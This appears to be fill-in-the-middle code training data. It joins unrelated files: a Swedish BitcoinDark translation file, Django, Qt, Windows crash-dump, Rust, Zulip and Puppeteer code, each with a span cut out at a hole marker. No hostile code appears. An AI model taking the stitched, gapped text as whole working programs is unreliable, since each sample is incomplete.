<translation>Skriv ut extra felsökningsinformation för nätverket</translation>
</message>
<message>
<location line="+1"/>
<source>Prepend debug output with timestamp</source>
<translation>Tidsstämpla felsökningsutskriften</translation>
</message>
<message>
<location line="+35"/>
<source>SSL options: (see the Bitcoin Wiki for SSL setup instructions)</source>
<translation>SSL-inställningar: (se Bitcoin-wikin för instruktioner om SSL-konfiguration)</translation>
</message>
<message>
<location line="-74"/>
<source>Select the version of socks proxy to use (4-5, default: 5)</source>
<translation>Välj version av socks-proxy som ska användas (4-5, förval: 5)</translation>
</message>
<message>
<location line="+41"/>
<source>Send trace/debug info to console instead of debug.log file</source>
<translation>Skicka trace-/debuginformation till terminalen istället för till debug.log</translation>
</message>
<message>
<location line="+1"/>
<source>Send trace/debug info to debugger</source>
<translation>Skicka trace/debug till debuggern</translation>
</message>
<message>
<location line="+28"/><|fim▁hole|> <source>Set maximum block size in bytes (default: 250000)</source>
<translation>Sätt största blockstorlek i bytes (förvalt: 250000)</translation>
</message>
<message>
<location line="-1"/>
<source>Set minimum block size in bytes (default: 0)</source>
<translation>Sätt minsta blockstorlek i byte (förvalt: 0)</translation>
</message>
<message>
<location line="-29"/>
<source>Shrink debug.log file on client startup (default: 1 when no -debug)</source>
<translation>Krymp debug.log filen vid klient start (förvalt: 1 vid ingen -debug)</translation>
</message>
<message>
<location line="-42"/>
<source>Specify connection timeout in milliseconds (default: 5000)</source>
<translation>Ange timeout för uppkoppling i millisekunder (förvalt: 5000)</translation>
</message>
<message>
<location line="+109"/>
<source>Unable to sign checkpoint, wrong checkpointkey?
</source>
<translation>Kan inte signera checkpoint, fel checkpointkey?
</translation>
</message>
<message>
<location line="-80"/>
<source>Use UPnP to map the listening port (default: 0)</source>
<translation>Använd UPnP för att mappa den lyssnande porten (förvalt: 0)</translation>
</message>
<message>
<location line="-1"/>
<source>Use UPnP to map the listening port (default: 1 when listening)</source>
<translation>Använd UPnP för att mappa den lyssnande porten (förvalt: 1 under lyssning)</translation>
</message>
<message>
<location line="-25"/>
<source>Use proxy to reach tor hidden services (default: same as -proxy)</source>
<translation>Använd proxy för att nå dolda tjänster i Tor (standard: samma som -proxy)</translation>
</message>
<message>
<location line="+42"/>
<source>Username for JSON-RPC connections</source>
<translation>Användarnamn för JSON-RPC-anslutningar</translation>
</message>
<message>
<location line="+47"/>
<source>Verifying database integrity...</source>
<translation>Verifierar integriteten i databasen...</translation>
</message>
<message>
<location line="+57"/>
<source>WARNING: syncronized checkpoint violation detected, but skipped!</source>
<translation>VARNING: brott mot synkroniserad kontrollpunkt upptäcktes, men hoppades över!</translation>
</message>
<message>
<location line="+1"/>
<source>Warning: Disk space is low!</source>
<translation>Varning: Lågt diskutrymme!</translation>
</message>
<message>
<location line="-2"/>
<source>Warning: This version is obsolete, upgrade required!</source>
<translation>Varning: denna version är föråldrad, uppgradering krävs!</translation>
</message>
<message>
<location line="-48"/>
<source>wallet.dat corrupt, salvage failed</source>
<translation>wallet.dat korrupt, räddning misslyckades</translation>
</message>
<message>
<location line="-54"/>
<source>Password for JSON-RPC connections</source>
<translation>Lösenord för JSON-RPC-anslutningar</translation>
</message>
<message>
<location line="-84"/>
<source>%s, you must set a rpcpassword in the configuration file:
%s
It is recommended you use the following random password:
rpcuser=BitcoinDarkrpc
rpcpassword=%s
(you do not need to remember this password)
The username and password MUST NOT be the same.
If the file does not exist, create it with owner-readable-only file permissions.
It is also recommended to set alertnotify so you are notified of problems;
for example: alertnotify=echo %%s | mail -s "BitcoinDark Alert" [email protected]
</source>
<translation>%s, du måste sätta rpcpassword i konfigurationsfilen:
%s
Det är rekommenderat att du använder följande slumpmässiga lösenord:
rpcuser=BitcoinDarkrpc
rpcpassword=%s
(du behöver inte komma ihåg detta lösenord)
Användarnamnet och lösenordet FÅR INTE vara samma.
Om filen inte finns, skapa den med endast ägarrättigheter.
Det är också rekommenderat att sätta alertnotify så du blir notifierad om problem;
till exempel: alertnotify=echo %%s | mail -s "BitcoinDark Varning" [email protected]
</translation>
</message>
<message>
<location line="+51"/>
<source>Find peers using internet relay chat (default: 0)</source>
<translation>Hitta andra klienter genom internet relay chat (standard: 0)</translation>
</message>
<message>
<location line="+5"/>
<source>Sync time with other nodes. Disable if time on your system is precise e.g. syncing with NTP (default: 1)</source>
<translation>Synkronisera tiden med andra noder. Avaktivera om klockan i ditt system är exakt, t.ex. synkroniserad med NTP (förval: 1)</translation>
</message>
<message>
<location line="+15"/>
<source>When creating transactions, ignore inputs with value less than this (default: 0.01)</source>
<translation>När transaktioner skapas, ignorera inputs med värde lägre än detta (standard: 0.01)</translation>
</message>
<message>
<location line="+16"/>
<source>Allow JSON-RPC connections from specified IP address</source>
<translation>Tillåt JSON-RPC-anslutningar från specifika IP-adresser</translation>
</message>
<message>
<location line="+1"/>
<source>Send commands to node running on <ip> (default: 127.0.0.1)</source>
<translation>Skicka kommandon till klient på <ip> (förvalt: 127.0.0.1)</translation>
</message>
<message>
<location line="+1"/>
<source>Execute command when the best block changes (%s in cmd is replaced by block hash)</source>
<translation>Exekvera kommando när det bästa blocket ändras (%s i cmd ersätts av blockets hash)</translation>
</message>
<message>
<location line="+3"/>
<source>Execute command when a wallet transaction changes (%s in cmd is replaced by TxID)</source>
<translation>Exekvera kommando när en plånbokstransaktion ändras (%s i cmd är ersatt av TxID)</translation>
</message>
<message>
<location line="+3"/>
<source>Require a confirmations for change (default: 0)</source>
<translation>Kräv bekräftelser för växel (förval: 0)</translation>
</message>
<message>
<location line="+1"/>
<source>Enforce transaction scripts to use canonical PUSH operators (default: 1)</source>
<translation>Tvinga transaktionsskript att använda kanoniska PUSH-operatorer (standard: 1)</translation>
</message>
<message>
<location line="+2"/>
<source>Execute command when a relevant alert is received (%s in cmd is replaced by message)</source>
<translation>Kör kommando när en relevant alert är mottagen (%s i cmd är ersatt av meddelandet)</translation>
</message>
<message>
<location line="+3"/>
<source>Upgrade wallet to latest format</source>
<translation>Uppgradera plånboken till senaste formatet</translation>
</message>
<message>
<location line="+1"/>
<source>Set key pool size to <n> (default: 100)</source>
<translation>Sätt storleken på nyckelpoolen till <n> (förvalt: 100)</translation>
</message>
<message>
<location line="+1"/>
<source>Rescan the block chain for missing wallet transactions</source>
<translation>Sök i blockkedjan efter saknade plånbokstransaktioner</translation>
</message>
<message>
<location line="+2"/>
<source>How many blocks to check at startup (default: 2500, 0 = all)</source>
<translation>Antal block som kollas vid start (standard: 2500, 0=alla)</translation>
</message>
<message>
<location line="+1"/>
<source>How thorough the block verification is (0-6, default: 1)</source>
<translation>Hur grundlig blockverifieringen är (0-6, standard: 1)</translation>
</message>
<message>
<location line="+1"/>
<source>Imports blocks from external blk000?.dat file</source>
<translation>Importera block från en extern blk000?.dat-fil</translation>
</message>
<message>
<location line="+8"/>
<source>Use OpenSSL (https) for JSON-RPC connections</source>
<translation>Använd OpenSSL (https) för JSON-RPC-anslutningar</translation>
</message>
<message>
<location line="+1"/>
<source>Server certificate file (default: server.cert)</source>
<translation>Serverns certifikatfil (förvalt: server.cert)</translation>
</message>
<message>
<location line="+1"/>
<source>Server private key (default: server.pem)</source>
<translation>Serverns privata nyckel (förvalt: server.pem)</translation>
</message>
<message>
<location line="+1"/>
<source>Acceptable ciphers (default: TLSv1+HIGH:!SSLv2:!aNULL:!eNULL:!AH:!3DES:@STRENGTH)</source>
<translation>Godtagbara chiffer (standard: TLSv1+HIGH:!SSLv2:!aNULL:!eNULL:!AH:!3DES:@STRENGTH)</translation>
</message>
<message>
<location line="+53"/>
<source>Error: Wallet unlocked for staking only, unable to create transaction.</source>
<translation>Fel: Plånboken öppnad endast för stake-process, kan inte skapa transaktion.</translation>
</message>
<message>
<location line="+18"/>
<source>WARNING: Invalid checkpoint found! Displayed transactions may not be correct! You may need to upgrade, or notify developers.</source>
<translation>VARNING: Felaktig kontrollpunkt hittad! Visade transaktioner kan vara felaktiga! Du kan behöva uppgradera eller kontakta utvecklarna.</translation>
</message>
<message>
<location line="-158"/>
<source>This help message</source>
<translation>Det här hjälpmeddelandet</translation>
</message>
<message>
<location line="+95"/>
<source>Wallet %s resides outside data directory %s.</source>
<translation>Plånbok %s ligger utanför datamappen %s.</translation>
</message>
<message>
<location line="+1"/>
<source>Cannot obtain a lock on data directory %s. BitcoinDark is probably already running.</source>
<translation>Kan inte låsa datakatalogen %s. BitcoinDark är sannolikt redan startad.</translation>
</message>
<message>
<location line="-98"/>
<source>BitcoinDark</source>
<translation>BitcoinDark</translation>
</message>
<message>
<location line="+140"/>
<source>Unable to bind to %s on this computer (bind returned error %d, %s)</source>
<translation>Det går inte att binda till %s på den här datorn (bind returnerade felmeddelande %d, %s)</translation>
</message>
<message>
<location line="-130"/>
<source>Connect through socks proxy</source>
<translation>Koppla genom en socks proxy</translation>
</message>
<message>
<location line="+3"/>
<source>Allow DNS lookups for -addnode, -seednode and -connect</source>
<translation>Tillåt DNS-sökningar för -addnode, -seednode och -connect</translation>
</message>
<message>
<location line="+122"/>
<source>Loading addresses...</source>
<translation>Laddar adresser...</translation>
</message>
<message>
<location line="-15"/>
<source>Error loading blkindex.dat</source>
<translation>Fel vid laddande av blkindex.dat</translation>
</message>
<message>
<location line="+2"/>
<source>Error loading wallet.dat: Wallet corrupted</source>
<translation>Fel vid inläsningen av wallet.dat: Plånboken är skadad</translation>
</message>
<message>
<location line="+4"/>
<source>Error loading wallet.dat: Wallet requires newer version of BitcoinDark</source>
<translation>Kunde inte ladda wallet.dat: En nyare version av BitcoinDark krävs</translation>
</message>
<message>
<location line="+1"/>
<source>Wallet needed to be rewritten: restart BitcoinDark to complete</source>
<translation>Plånboken måste skrivas om: Starta om BitcoinDark för att slutföra</translation>
</message>
<message>
<location line="+1"/>
<source>Error loading wallet.dat</source>
<translation>Fel vid inläsning av plånboksfilen wallet.dat</translation>
</message>
<message>
<location line="-16"/>
<source>Invalid -proxy address: '%s'</source>
<translation>Ogiltig -proxy adress: '%s'</translation>
</message>
<message>
<location line="-1"/>
<source>Unknown network specified in -onlynet: '%s'</source>
<translation>Okänt nätverk som anges i -onlynet: '%s'</translation>
</message>
<message>
<location line="-1"/>
<source>Unknown -socks proxy version requested: %i</source>
<translation>Okänd -socks proxy version begärd: %i</translation>
</message>
<message>
<location line="+4"/>
<source>Cannot resolve -bind address: '%s'</source>
<translation>Kan inte matcha -bind adress: '%s'</translation>
</message>
<message>
<location line="+2"/>
<source>Cannot resolve -externalip address: '%s'</source>
<translation>Kan inte matcha -externalip adress: '%s'</translation>
</message>
<message>
<location line="-24"/>
<source>Invalid amount for -paytxfee=<amount>: '%s'</source>
<translation>Ogiltigt belopp för -paytxfee=<belopp>: '%s'</translation>
</message>
<message>
<location line="+44"/>
<source>Error: could not start node</source>
<translation>Fel: kunde inte starta noden</translation>
</message>
<message>
<location line="+11"/>
<source>Sending...</source>
<translation>Skickar...</translation>
</message>
<message>
<location line="+5"/>
<source>Invalid amount</source>
<translation>Ogiltigt belopp</translation>
</message>
<message>
<location line="+1"/>
<source>Insufficient funds</source>
<translation>Otillräckliga medel</translation>
</message>
<message>
<location line="-34"/>
<source>Loading block index...</source>
<translation>Laddar blockindex...</translation>
</message>
<message>
<location line="-103"/>
<source>Add a node to connect to and attempt to keep the connection open</source>
<translation>Lägg till en nod att koppla upp mot och försök att hålla anslutningen öppen</translation>
</message>
<message>
<location line="+122"/>
<source>Unable to bind to %s on this computer. BitcoinDark is probably already running.</source>
<translation>Kan inte binda till %s på denna dator. BitcoinDark är sannolikt redan startad.</translation>
</message>
<message>
<location line="-97"/>
<source>Fee per KB to add to transactions you send</source>
<translation>Avgift per KB som adderas till transaktionen du sänder</translation>
</message>
<message>
<location line="+55"/>
<source>Invalid amount for -mininput=<amount>: '%s'</source>
<translation>Ogiltigt belopp för -mininput=<amount>: '%s'</translation>
</message>
<message>
<location line="+25"/>
<source>Loading wallet...</source>
<translation>Laddar plånbok...</translation>
</message>
<message>
<location line="+8"/>
<source>Cannot downgrade wallet</source>
<translation>Kan inte nedgradera plånboken</translation>
</message>
<message>
<location line="+1"/>
<source>Cannot initialize keypool</source>
<translation>Kan inte initialisera keypool</translation>
</message>
<message>
<location line="+1"/>
<source>Cannot write default address</source>
<translation>Kan inte skriva standardadress</translation>
</message>
<message>
<location line="+1"/>
<source>Rescanning...</source>
<translation>Söker igen...</translation>
</message>
<message>
<location line="+5"/>
<source>Done loading</source>
<translation>Klar med laddning</translation>
</message>
<message>
<location line="-167"/>
<source>To use the %s option</source>
<translation>För att använda %s-alternativet</translation>
</message>
<message>
<location line="+14"/>
<source>Error</source>
<translation>Fel</translation>
</message>
<message>
<location line="+6"/>
<source>You must set rpcpassword=<password> in the configuration file:
%s
If the file does not exist, create it with owner-readable-only file permissions.</source>
<translation>Du måste sätta rpcpassword=<lösenord> i konfigurationsfilen:
%s
Om filen inte existerar, skapa den med filrättigheten endast läsbar för ägaren.</translation>
</message>
</context>
</TS><|fim▁end|> | |
<|file_name|>wsgi.py<|end_file_name|><|fim▁begin|><|fim▁hole|>
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/1.11/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "django_tutorial.settings")
application = get_wsgi_application()<|fim▁end|> | """
WSGI config for django_tutorial project. |
<|file_name|>glyphviewerdialogextension.cpp<|end_file_name|><|fim▁begin|>/*
(c) Copyright 2002, 2003 Rogier van Dalen
([email protected] for any comments, questions or bugs)
This file is part of my OpenType/TrueType Font Tools.
The OpenType/TrueType Font Tools is free software; you can redistribute
it and/or modify it under the terms of the GNU General Public License as
published by the Free Software Foundation; either version 2 of the
License, or (at your option) any later version.
The OpenType/TrueType Font Tools is distributed in the hope that it will
be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General
Public License for more details.
You should have received a copy of the GNU General Public License
along with the OpenType/TrueType Font Tools; if not, write to the Free
Software Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
In addition, as a special exception, Rogier van Dalen gives permission
to link the code of this program with Qt non-commercial edition (or with
modified versions of Qt non-commercial edition that use the same license
as Qt non-commercial edition), and distribute linked combinations
including the two. You must obey the GNU General Public License in all
respects for all of the code used other than Qt non-commercial edition.
If you modify this file, you may extend this exception to your version of
the file, but you are not obligated to do so. If you do not wish to do
so, delete this exception statement from your version.
*/
#include <qpushbutton.h>
#include "glyphviewerdialogextension.h"
GlyphViewerDialogExtension::GlyphViewerDialogExtension (QWidget* parent)<|fim▁hole|> connect( buttonBackInstruction, SIGNAL( clicked() ), parent, SLOT( backInstruction() ) );
connect( buttonPreviousInstruction, SIGNAL( clicked() ), parent, SLOT( previousInstruction() ) );
connect( buttonNextInstruction, SIGNAL( clicked() ), parent, SLOT( nextInstruction() ) );
connect( buttonForwardInstruction, SIGNAL( clicked() ), parent, SLOT( forwardInstruction() ) );
connect( buttonLastInstruction, SIGNAL( clicked() ), parent, SLOT( lastInstruction() ) );
connect( buttonStackViewer, SIGNAL( clicked() ), parent, SLOT( openStackViewer() ) );
connect( buttonStorageViewer, SIGNAL( clicked() ), parent, SLOT( openStorageViewer() ) );
connect( buttonCVTViewer, SIGNAL( clicked() ), parent, SLOT( openCVTViewer() ) );
connect( buttonGraphicsStateViewer, SIGNAL( clicked() ), parent, SLOT( openGraphicsStateViewer() ) );
}
GlyphViewerDialogExtension::~GlyphViewerDialogExtension() {}<|fim▁end|> | : GlyphViewerDialogExtensionBase (parent)
{
connect( buttonFirstInstruction, SIGNAL( clicked() ), parent, SLOT( firstInstruction() ) ); |
<|file_name|>HandleException.cpp<|end_file_name|><|fim▁begin|>#include "stdafx.h"
#include "HandleException.h"
#include <dbghelp.h>
#pragma comment ( lib, "dbghelp.lib" )
typedef LONG (WINAPI * UNHANDLEDEXCEPTIONFILTER)
(
struct _EXCEPTION_POINTERS *ExceptionInfo
);
static HANDLE gEventExit = NULL;
static LONG lExceptCode = EXCEPTION_EXECUTE_HANDLER;
static CHAR szDumpFile[MAX_PATH]={0};
static BOOL bMakeDumpFile = TRUE;
//static LPTOP_LEVEL_EXCEPTION_FILTER defaultExceptionCallBack = NULL;
static UNHANDLEDEXCEPTIONFILTER Real_UnhandledExceptionFilter = NULL;
static PFN_HandleException fnSEHException = NULL;
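// Writes a MiniDumpNormal crash dump for the current process to a
// timestamp-named file (yyyymmddhhmmssmmm.dmp), then signals gEventExit
// so the waiting unhandled-exception filter can finish shutting down.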
static LONG WINAPI DeBug_CreateDump(EXCEPTION_POINTERS* pExceptionPointers)
{
BOOL bMiniDumpSuccessful;
//TCHAR szFileName[MAX_PATH];
if (bMakeDumpFile)
{
HANDLE hDumpFile;
MINIDUMP_EXCEPTION_INFORMATION ExpParam;
SYSTEMTIME sys_time;
GetLocalTime(&sys_time);
wsprintfA( szDumpFile,"%04d%02d%02d%02d%02d%02d%03d.dmp",
sys_time.wYear,sys_time.wMonth,sys_time.wDay,sys_time.wHour,
sys_time.wMinute,sys_time.wSecond,sys_time.wMilliseconds);
hDumpFile = CreateFileA(szDumpFile, GENERIC_READ|GENERIC_WRITE,
FILE_SHARE_WRITE|FILE_SHARE_READ, 0, CREATE_ALWAYS, 0, 0);
if (hDumpFile != INVALID_HANDLE_VALUE)
{
ExpParam.ThreadId = GetCurrentThreadId();
ExpParam.ExceptionPointers = pExceptionPointers;
ExpParam.ClientPointers = TRUE;
bMiniDumpSuccessful = MiniDumpWriteDump(GetCurrentProcess(), GetCurrentProcessId(),
hDumpFile, MiniDumpNormal,
&ExpParam, NULL, NULL);
CloseHandle(hDumpFile);
}
}
if(gEventExit) SetEvent(gEventExit);
return lExceptCode;
}
<|fim▁hole|>static LONG WINAPI DeBug_UnHandleCreateDump(EXCEPTION_POINTERS* pExceptionPointers)
{
DeBug_CreateDump(pExceptionPointers);
if (fnSEHException)
{
fnSEHException(szDumpFile);
}
if(gEventExit)
{
WaitForSingleObject(gEventExit,3000);
}
if(EXCEPTION_EXECUTE_HANDLER == lExceptCode) ExitProcess(0);
return lExceptCode;
}
static BOOL StartHookDebug()
{
//Kernel32
HMODULE hModule = LoadLibrary(_T("Kernel32.dll"));
if (hModule == NULL)
{
return FALSE;
}
Real_UnhandledExceptionFilter = (UNHANDLEDEXCEPTIONFILTER)GetProcAddress(hModule,"UnhandledExceptionFilter");
if (Real_UnhandledExceptionFilter == NULL)
{
return FALSE;
}
// Hook the current two functions
if (!Mhook_SetHook((PVOID*)&Real_UnhandledExceptionFilter, DeBug_UnHandleCreateDump))
{
return FALSE;
}
return TRUE;
}
void HandleException::EnableDumpFile( BOOL bMakeDump /*= TRUE*/ )
{
bMakeDumpFile = bMakeDump;
}
void HandleException::SetExceptionCallback( PFN_HandleException fn ,LONG lExceptHandleCode )
{
lExceptCode = lExceptHandleCode;
fnSEHException = fn;
gEventExit = CreateEvent(NULL,FALSE,FALSE,NULL);
StartHookDebug();
//defaultExceptionCallBack = SetUnhandledExceptionFilter(&DeBug_CreateDump);
}<|fim▁end|> | |
<|file_name|>rv.py<|end_file_name|><|fim▁begin|>import os
from subprocess import call, Popen, PIPE<|fim▁hole|>from . import Command
from . import utils
class OpenSequenceInRV(Command):
"""%prog [options] [paths]
Open the latest version for each given entity.
"""
def run(self, sgfs, opts, args):
# Parse them all.
arg_to_movie = {}
arg_to_entity = {}
for arg in args:
if os.path.exists(arg):
arg_to_movie[arg] = arg
continue
print 'Parsing %r...' % arg
data = utils.parse_spec(sgfs, arg.split(), ['Shot'])
type_ = data.get('type')
id_ = data.get('id')
if not (type_ or id_):
print 'no entities found for', repr(arg)
return 1
arg_to_entity.setdefault(type_, {})[arg] = sgfs.session.merge(dict(type=type_, id=id_))
tasks = arg_to_entity.pop('Task', {})
shots = arg_to_entity.pop('Shot', {})
if arg_to_entity:
print 'found entities that were not Task or Shot:', ', '.join(sorted(arg_to_entity))
return 2
if tasks:
print 'Getting shots from tasks...'
sgfs.session.fetch(tasks.values(), 'entity')
for arg, task in tasks.iteritems():
shots[arg] = task['entity']
if shots:
print 'Getting versions from shots...'
sgfs.session.fetch(shots.values(), ('sg_latest_version.Version.sg_path_to_movie', 'sg_latest_version.Version.sg_path_to_frames'))
for arg, shot in shots.iteritems():
version = shot.get('sg_latest_version')
if not version:
print 'no version for', shot
return 3
path = version.get('sg_path_to_movie') or version.get('sg_path_to_frames')
if not path:
print 'no movie or frames for', version
return 4
arg_to_movie[arg] = path
movies = [arg_to_movie[arg] for arg in args]
print 'Opening:'
print '\t' + '\n\t'.join(movies)
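# 'rv -bakeURL' reports the baked rvlink URL on stderr; keep only the last token.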
rvlink = Popen(['rv', '-bakeURL'] + movies, stderr=PIPE).communicate()[1].strip().split()[-1]
self.open(rvlink)
def open(self, x):
if sys.platform.startswith('darwin'):
call(['open', x])
else:
call(['xdg-open', x])
run = OpenSequenceInRV()<|fim▁end|> | import sys
|
<|file_name|>at_exit_imp.rs<|end_file_name|><|fim▁begin|>// Copyright 2013 The Rust Project Developers. See the COPYRIGHT
// file at the top-level directory of this distribution and at
// http://rust-lang.org/COPYRIGHT.
//
// Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or
// http://www.apache.org/licenses/LICENSE-2.0> or the MIT license
// <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your
// option. This file may not be copied, modified, or distributed
// except according to those terms.
//! Implementation of running at_exit routines
//!
//! Documentation can be found on the `rt::at_exit` function.
use core::prelude::*;
use boxed::Box;
use vec::Vec;
use mem;
use thunk::Thunk;
use sys_common::mutex::{Mutex, MUTEX_INIT};
type Queue = Vec<Thunk<'static>>;
// NB these are specifically not types from `std::sync` as they currently rely
// on poisoning and this module needs to operate at a lower level than requiring
// the thread infrastructure to be in place (useful on the borders of
// initialization/destruction).
static LOCK: Mutex = MUTEX_INIT;
static mut QUEUE: *mut Queue = 0 as *mut Queue;
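// QUEUE lifecycle: null until `init` allocates the boxed Vec, then a live
// pointer; `cleanup` replaces it with the poison value 1 so a later `init`
// or re-entrant cleanup trips the rtassert!s below.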
unsafe fn init() {
if QUEUE.is_null() {
let state: Box<Queue> = box Vec::new();
QUEUE = mem::transmute(state);
} else {
// can't re-init after a cleanup
rtassert!(QUEUE as uint != 1);<|fim▁hole|> // instead the cleanup is tied to the `std::rt` entry point.
//
// ::libc::atexit(cleanup);
}
pub fn cleanup() {
unsafe {
LOCK.lock();
let queue = QUEUE;
QUEUE = 1 as *mut _;
LOCK.unlock();
// make sure we're not recursively cleaning up
rtassert!(queue as uint != 1);
// If we never called init, not need to cleanup!
if queue as uint != 0 {
let queue: Box<Queue> = mem::transmute(queue);
for to_run in *queue {
to_run.invoke(());
}
}
}
}
pub fn push(f: Thunk<'static>) {
unsafe {
LOCK.lock();
init();
(*QUEUE).push(f);
LOCK.unlock();
}
}<|fim▁end|> | }
// FIXME: switch this to use atexit as below. Currently this
// segfaults (the queue's memory is mysteriously gone), so |
<|file_name|>fix_unreads.py<|end_file_name|><|fim▁begin|>import time
import logging
from typing import Callable, List, TypeVar, Text
from psycopg2.extensions import cursor
CursorObj = TypeVar('CursorObj', bound=cursor)
from django.db import connection
from zerver.models import UserProfile
'''
NOTE! Be careful modifying this library, as it is used
in a migration, and it needs to be valid for the state
of the database that is in place when the 0104_fix_unreads
migration runs.
'''<|fim▁hole|>logger = logging.getLogger('zulip.fix_unreads')
logger.setLevel(logging.WARNING)
def build_topic_mute_checker(cursor, user_profile):
# type: (CursorObj, UserProfile) -> Callable[[int, Text], bool]
'''
This function is similar to the function of the same name
in zerver/lib/topic_mutes.py, but it works without the ORM,
so that we can use it in migrations.
'''
query = '''
SELECT
recipient_id,
topic_name
FROM
zerver_mutedtopic
WHERE
user_profile_id = %s
'''
cursor.execute(query, [user_profile.id])
rows = cursor.fetchall()
tups = {
(recipient_id, topic_name.lower())
for (recipient_id, topic_name) in rows
}
def is_muted(recipient_id, topic):
# type: (int, Text) -> bool
return (recipient_id, topic.lower()) in tups
return is_muted
def update_unread_flags(cursor, user_message_ids):
# type: (CursorObj, List[int]) -> None
um_id_list = ', '.join(str(id) for id in user_message_ids)
query = '''
UPDATE zerver_usermessage
SET flags = flags | 1
WHERE id IN (%s)
''' % (um_id_list,)
cursor.execute(query)
def get_timing(message, f):
# type: (str, Callable) -> None
start = time.time()
logger.info(message)
f()
elapsed = time.time() - start
logger.info('elapsed time: %.03f\n' % (elapsed,))
def fix_unsubscribed(cursor, user_profile):
# type: (CursorObj, UserProfile) -> None
recipient_ids = []
def find_recipients():
# type: () -> None
query = '''
SELECT
zerver_subscription.recipient_id
FROM
zerver_subscription
INNER JOIN zerver_recipient ON (
zerver_recipient.id = zerver_subscription.recipient_id
)
WHERE (
zerver_subscription.user_profile_id = '%s' AND
zerver_recipient.type = 2 AND
(NOT zerver_subscription.active)
)
'''
cursor.execute(query, [user_profile.id])
rows = cursor.fetchall()
for row in rows:
recipient_ids.append(row[0])
logger.info(str(recipient_ids))
get_timing(
'get recipients',
find_recipients
)
if not recipient_ids:
return
user_message_ids = []
def find():
# type: () -> None
recips = ', '.join(str(id) for id in recipient_ids)
query = '''
SELECT
zerver_usermessage.id
FROM
zerver_usermessage
INNER JOIN zerver_message ON (
zerver_message.id = zerver_usermessage.message_id
)
WHERE (
zerver_usermessage.user_profile_id = %s AND
(zerver_usermessage.flags & 1) = 0 AND
zerver_message.recipient_id in (%s)
)
''' % (user_profile.id, recips)
logger.info('''
EXPLAIN analyze''' + query.rstrip() + ';')
cursor.execute(query)
rows = cursor.fetchall()
for row in rows:
user_message_ids.append(row[0])
logger.info('rows found: %d' % (len(user_message_ids),))
get_timing(
'finding unread messages for non-active streams',
find
)
if not user_message_ids:
return
def fix():
# type: () -> None
update_unread_flags(cursor, user_message_ids)
get_timing(
'fixing unread messages for non-active streams',
fix
)
def fix_pre_pointer(cursor, user_profile):
# type: (CursorObj, UserProfile) -> None
pointer = user_profile.pointer
if not pointer:
return
recipient_ids = []
def find_non_muted_recipients():
# type: () -> None
query = '''
SELECT
zerver_subscription.recipient_id
FROM
zerver_subscription
INNER JOIN zerver_recipient ON (
zerver_recipient.id = zerver_subscription.recipient_id
)
WHERE (
zerver_subscription.user_profile_id = '%s' AND
zerver_recipient.type = 2 AND
zerver_subscription.in_home_view AND
zerver_subscription.active
)
'''
cursor.execute(query, [user_profile.id])
rows = cursor.fetchall()
for row in rows:
recipient_ids.append(row[0])
logger.info(str(recipient_ids))
get_timing(
'find_non_muted_recipients',
find_non_muted_recipients
)
if not recipient_ids:
return
user_message_ids = []
def find_old_ids():
# type: () -> None
recips = ', '.join(str(id) for id in recipient_ids)
is_topic_muted = build_topic_mute_checker(cursor, user_profile)
query = '''
SELECT
zerver_usermessage.id,
zerver_message.recipient_id,
zerver_message.subject
FROM
zerver_usermessage
INNER JOIN zerver_message ON (
zerver_message.id = zerver_usermessage.message_id
)
WHERE (
zerver_usermessage.user_profile_id = %s AND
zerver_usermessage.message_id <= %s AND
(zerver_usermessage.flags & 1) = 0 AND
zerver_message.recipient_id in (%s)
)
''' % (user_profile.id, pointer, recips)
logger.info('''
EXPLAIN analyze''' + query.rstrip() + ';')
cursor.execute(query)
rows = cursor.fetchall()
for (um_id, recipient_id, topic) in rows:
if not is_topic_muted(recipient_id, topic):
user_message_ids.append(um_id)
logger.info('rows found: %d' % (len(user_message_ids),))
get_timing(
'finding pre-pointer messages that are not muted',
find_old_ids
)
if not user_message_ids:
return
def fix():
# type: () -> None
update_unread_flags(cursor, user_message_ids)
get_timing(
'fixing unread messages for pre-pointer non-muted messages',
fix
)
def fix(user_profile):
# type: (UserProfile) -> None
logger.info('\n---\nFixing %s:' % (user_profile.email,))
with connection.cursor() as cursor:
fix_unsubscribed(cursor, user_profile)
fix_pre_pointer(cursor, user_profile)<|fim▁end|> | |
<|file_name|>urls.py<|end_file_name|><|fim▁begin|>from django.conf.urls import url
from . import views<|fim▁hole|><|fim▁end|> |
urlpatterns = [
url(r'^$', views.AP_list, name='AP_list'),
] |
<|file_name|>profile-page.ts<|end_file_name|><|fim▁begin|>import { Page } from 'puppeteer';
import Textbox from 'app/element/textbox';
import AuthenticatedPage from 'app/page/authenticated-page';
import { waitForDocumentTitle, waitForUrl, waitWhileLoading } from 'utils/waits-utils';
import Button from 'app/element/button';
import Textarea from 'app/element/textarea';
import { PageUrl } from 'app/text-labels';
import Link from 'app/element/link';
export const PageTitle = 'Profile';
const LabelAlias = {
ResearchBackground: 'Your research background, experience and research interests',
SaveProfile: 'Save Profile',
NeedsConfirmation: 'Please update or verify your profile.',
LooksGood: 'Looks Good'
};
const DataTestIdAlias = {
FirstName: 'givenName',
LastName: 'familyName',
ProfessionalUrl: 'professionalUrl',<|fim▁hole|> State: 'state',
Zip: 'zipCode',
Country: 'country'
};
export const MissingErrorAlias = {
FirstName: 'First Name',
LastName: 'Last Name',
ResearchBackground: 'Current Research',
Address1: 'Street address1',
City: 'City',
State: 'State',
Zip: 'Zip code',
Country: 'Country'
};
export default class ProfilePage extends AuthenticatedPage {
constructor(page: Page) {
super(page);
}
/**
* Load 'Profile' page and ensure page load is completed.
*/
async load(): Promise<this> {
await this.loadPage({ url: PageUrl.Profile });
await waitWhileLoading(this.page);
return this;
}
async isLoaded(): Promise<boolean> {
await Promise.all([waitForUrl(this.page, '/profile'), waitForDocumentTitle(this.page, PageTitle)]);
await waitWhileLoading(this.page);
return true;
}
getFirstNameInput(): Textbox {
return Textbox.findByName(this.page, { dataTestId: DataTestIdAlias.FirstName });
}
getLastNameInput(): Textbox {
return Textbox.findByName(this.page, { dataTestId: DataTestIdAlias.LastName });
}
getProfessionalUrlInput(): Textbox {
